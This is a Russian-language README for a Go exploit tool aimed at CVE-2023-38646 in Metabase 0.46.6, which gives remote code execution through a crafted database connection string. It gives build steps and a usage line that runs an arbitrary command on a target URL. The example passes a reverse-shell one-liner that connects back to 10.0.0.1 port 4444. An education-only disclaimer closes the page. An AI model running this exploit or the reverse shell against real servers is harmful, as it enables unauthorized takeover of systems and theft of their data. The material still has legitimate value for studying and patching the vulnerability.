
Эксплойт для CVE-2023-38646 в Metabase 0.46.6, обеспечивающий удалённое выполнение кода через специально сформированные запросы и получение токена настройки.
Эксплойт для CVE-2023-38646 Metabase 0.46.6
Этот инструмент эксплуатирует уязвимость (CVE-2023-38646) в программной платформе. Эксплойт позволяет выполнять удалённый код с помощью специально сформированного запроса, используя некорректную обработку строки подключения к базе данных.
Инструмент:
Клонируйте репозиторий:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: URL платформы, которую необходимо просканировать и эксплуатировать. COMMAND: Команда, которую необходимо выполнить на цели. PROXY_URL (Необязательно): URL прокси-сервера (например, http://127.0.0.1:8080). Если не указан, прокси использоваться не будет.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
Этот инструмент предназначен только для образовательных и исследовательских целей. Всегда убедитесь, что у вас есть соответствующие разрешения перед сканированием или эксплуатацией любой цели. Неправомерное использование этого инструмента строго противоречит намерениям разработчика и может быть незаконным.
Не стесняйтесь открывать issues для любых отзывов, сообщений об ошибках или запросов функций. Pull request'ы всегда приветствуются!